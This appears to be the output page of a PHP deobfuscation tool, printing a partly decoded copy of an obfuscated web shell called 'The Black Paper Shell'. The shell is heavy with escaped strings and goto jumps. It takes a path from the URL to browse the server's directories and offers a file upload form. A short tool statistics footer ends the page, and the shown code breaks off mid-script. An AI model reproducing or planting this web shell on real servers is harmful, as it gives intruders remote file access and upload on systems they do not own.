"\x3c\41\x44\x4f\x43\124\131\120\105\x20\x48\124\115\x4c\x3e\xa\x3c\x48\124\115\114\76\xa\74\110\x45\101\104\76\xa\x3c\x6c\151\156\153\x20\150\x72\145\146\x3d\x22\42\x20\162\x65\x6c\75\42\x73\x74\171\154\x65\x73\x68\x65\x65\164\42\x20\x74\x79\x70\x65\75\x22\x74\145\x78\x74\x2f\x63\163\163\42\x3e\12\74\164\151\164\x6c\x65\76\124\x68\145\40\102\x6c\x61\x63\x6b\x20\x50\141\160\145\x72\74\57\x74\x69\x74\154\145\x3e\74\154\x69\156\x6b\40\x72\x65\154\x3d\x22\x53\110\117\x52\124\x43\x55\124\x20\x49\103\x4f\116\x22\40\x20\x68\162\x65\x66\75\x22\150\164\164\x70\163\x3a\x2f\57\164\150\x65\142\154\x61\143\153\160\141\x70\145\162\56\x6f\x72\147\x2f\x54\102\120\56\x6a\160\x67\x22\x3e\12\74\163\164\171\154\145\76\12\x62\x6f\x64\171\173\12\146\x6f\156\x74\55\x66\141\155\x69\x6c\171\72\x20\x22\x43\157\x75\x72\x69\145\x72\42\x2c\x20\x63\x75\162\163\x69\166\x65\x3b\12\143\157\154\x6f\x72\72\40\x23\146\x66\x66\73\12\142\141\143\153\x67\x72\x6f\x75\x6e\144\55\x63\x6f\x6c\157\162\x3a\40\43\x30\x30\x30\x3b\12\164\x65\170\164\x2d\163\150\141\144\x6f\x77\72\x30\x70\170\x20\x30\x70\x78\x20\61\x70\x78\40\43\67\65\x37\65\x37\65\73\12\175\12\43\x63\x6f\156\164\x65\x6e\164\x20\164\162\72\150\x6f\166\x65\162\173\12\142\x61\x63\153\147\162\157\x75\156\x64\55\x63\x6f\x6c\x6f\162\72\40\43\x30\60\x30\x3b\12\x74\x65\170\x74\x2d\163\x68\141\144\x6f\x77\72\x30\160\170\40\60\160\170\x20\x31\60\x70\x78\40\x23\146\x66\146\x3b\xa\175\12\x23\143\157\x6e\x74\x65\156\x74\40\x2e\146\x69\x72\163\164\x7b\12\142\141\143\153\x67\162\157\x75\x6e\x64\x2d\143\157\154\157\162\x3a\x20\x23\64\x44\x34\x44\64\x44\73\12\x7d\12\43\x63\157\x6e\x74\x65\x6e\x74\x20\x2e\x66\x69\x72\x73\164\72\x68\x6f\x76\145\162\173\12\x62\x61\x63\x6b\147\x72\157\165\156\144\55\x63\157\x6c\157\x72\x3a\x20\43\64\x44\x34\104\64\104\73\12\164\x65\x78\x74\55\163\x68\x61\144\x6f\167\72\x30\160\x78\40\x30\160\170\x20\x31\160\170\x20\43\x37\65\67\x35\x37\x35\x3b\xa\x7d\12\x48\61\x7b\12\x66\x6f\x6e\164\x2d\x66\x61\x6d\x69\x6c\171\x3a\x20\42\x43\x6f\x75\x72\151\145\x72\x22\54\40\143\x75\162\x73\x69\x76\x65\73\12\143\157\x6c\157\162\x3a\x20\43\x66\x66\x66\x3b\12\175\12\141\173\xa\143\x6f\154\157\162\x3a\x20\x23\x66\x66\146\73\12\x74\x65\170\x74\55\x64\145\x63\x6f\162\141\164\151\x6f\156\x3a\x20\x6e\157\x6e\145\x3b\12\175\12\141\72\x68\x6f\166\145\x72\173\12\x63\157\x6c\x6f\162\x3a\x20\43\146\x66\146\73\12\164\x65\x78\164\55\163\x68\x61\144\157\167\x3a\60\160\170\x20\x30\x70\170\40\x35\160\x78\40\43\x66\x66\x66\x66\x66\146\x3b\xa\x7d\xa\151\x6e\x70\165\x74\x2c\x73\145\154\x65\143\x74\54\x74\x65\x78\164\x61\162\145\141\173\xa\142\157\162\x64\145\162\72\x20\61\160\x78\x20\x23\146\146\146\40\163\157\154\x69\144\x3b\xa\55\x6d\157\172\55\x62\157\x72\144\x65\162\55\x72\141\x64\151\x75\x73\72\40\x35\x70\x78\73\xa\x2d\x77\145\x62\x6b\151\164\55\142\x6f\162\x64\x65\x72\x2d\x72\141\x64\151\x75\163\72\65\x70\170\73\xa\x62\x6f\x72\144\145\x72\55\162\x61\x64\151\x75\x73\x3a\x35\160\170\73\xa\x7d\xa\146\x6f\x6f\164\40\x7b\12\x9\11\x62\141\143\153\x67\162\x6f\x75\x6e\144\55\x63\x6f\x6c\157\162\x3a\40\x62\154\141\143\153\x3b\12\x20\x20\143\157\154\157\x72\x3a\x20\x77\150\151\x74\145\x3b\12\11\x7d\xa\x3c\57\x73\x74\171\154\x65\x3e\xa\x3c\x2f\x48\x45\101\104\76\12\74\102\x4f\104\131\40\x62\147\143\x6f\x6c\x6f\162\75\42\167\x68\x69\164\x65\42\76\74\143\145\156\x74\145\162\x3e\xa\74\151\x6d\147\40\163\162\x63\x3d\x22\150\164\164\160\163\72\x2f\57\x31\56\142\x70\x2e\x62\x6c\x6f\147\x73\160\157\164\56\x63\157\155\x2f\55\x65\x79\x4e\70\x71\154\x69\x78\x33\110\115\x2f\130\61\116\63\152\x6b\x68\x33\x52\x4a\111\57\101\x41\101\101\101\x41\x41\101\101\x59\105\x2f\60\64\117\153\x74\61\70\x78\130\x30\115\126\x5a\x4e\x6f\120\125\152\121\166\114\x41\142\x65\60\157\x4e\110\x69\x48\x7a\x48\101\103\x4c\x63\x42\107\101\163\x59\x48\121\x2f\x73\63\x32\60\x2f\70\x36\x35\x39\x31\x34\67\70\x2d\62\x31\x61\x33\55\64\x37\x66\x30\x2d\71\141\144\x30\55\61\x33\64\x32\x32\x39\x37\145\x39\145\x36\x65\x2e\152\x70\x67\x22\x3e\x3c\x2f\x63\145\x6e\164\x65\x72\x3e\12\x3c\110\x31\40\x63\x6c\x61\x73\x73\75\x22\146\x6f\x6f\164\x22\x3e\x3c\143\x65\x6e\164\145\162\76\x54\150\145\x20\102\154\141\x63\153\40\120\141\x70\145\162\x3c\x2f\143\145\x6e\x74\x65\x72\x3e\74\57\x48\61\x3e\74\x68\162\x3e\74\155\x61\162\161\x75\x65\x65\x20\143\154\141\163\163\x3d\x22\x66\157\x6f\x74\x22\x3e\124\x68\x65\40\x42\x6c\x61\x63\153\40\x50\x61\x70\x65\162\x20\123\150\145\x6c\x6c\x3c\x2f\155\141\162\x71\165\145\145\x3e\x3c\x68\162\x3e\12\x3c\164\141\142\154\145\40\x77\x69\x64\164\x68\75\x22\67\x30\60\x22\x20\x62\157\x72\144\145\162\x3d\x22\x30\42\x20\x63\x65\x6c\x6c\160\141\x64\x64\x69\x6e\x67\x3d\x22\63\x22\40\143\x65\154\x6c\x73\x70\141\x63\151\156\x67\x3d\x22\x31\42\40\x61\x6c\x69\147\156\75\x22\143\x65\x6e\164\145\x72\42\x3e\xa\74\x74\162\x3e\x3c\x74\144\x3e\x43\x75\x72\162\x65\156\x74\40\120\x61\164\150\40\x3a\x20"; goto XRK4K; FYisV: $path = str_replace("\x5c", "\57", $path); goto GgFzf; ize1L: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\74\141\x20\150\162\145\146\x3d\42\77\x70\141\x74\150\75\57\x22\x3e\x2f\74\x2f\141\76"; continue; } if ($pat == '') { continue; } echo "\74\x61\x20\x68\162\145\x66\x3d\x22\x3f\x70\x61\x74\x68\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\x2f"; } } echo "\x22\76" . $pat . "\x3c\x2f\141\x3e\57"; } goto QljbJ; XRK4K: if (isset($_GET["\160\141\x74\x68"])) { $path = $_GET["\x70\x61\x74\150"]; } else { $path = getcwd(); } goto FYisV; KiHiY: echo "\x3c\x66\x6f\162\x6d\x20\x65\x6e\143\x74\171\160\x65\75\42\155\165\x6c\164\151\x70\141\x72\x74\57\146\x6f\x72\x6d\55\144\x61\x74\x61\42\x20\155\145\164\x68\157\144\x3d\42\x50\117\x53\x54\42\76\12\115\x61\163\x75\x6b\141\156\40\x46\151\154\145\x20\72\40\74\x69\156\x70\x75\164\x20\164\171\x70\x65\75\42\x66\x69\154\x65\42\x20\156\x61\x6d\x65\75\x22\146\x69\x6c\x65\x22\40\57\76\12\74\x69\156\160\165\164\x20\164\171\160\x65\75\42\163\x75\142\155\151\164\x22\40\166\141\x6c\x75\x65\75\42\x75\160\154\157\x61\144\42\x20\x2f\76\12\74\57\146\x6f\162\155\76\xa\74\57\164\144\x3e\x3c\57\x74\x72\x3e"; goto wVoF9; aS0Bl: echo "\xa\x3c\57\102\x4f\x44\131\76\12\74\57\110\124\x4d\114\76"; goto k1sQa; GgFzf: $paths = explode("\57", $path); goto ize1L; QljbJ: echo "\x3c\57\x74\144\x3e\x3c\57\x74\x72\x3e\x3c\x74\x72\x3e\74\x74\x64\x3e"; goto wNrls; JcIh2:

Function Calls

None

Variables

None

Stats

MD5 5d933ade1677560ffcdf34582f3ccb2a
Eval Count 0
Decode Time 102 ms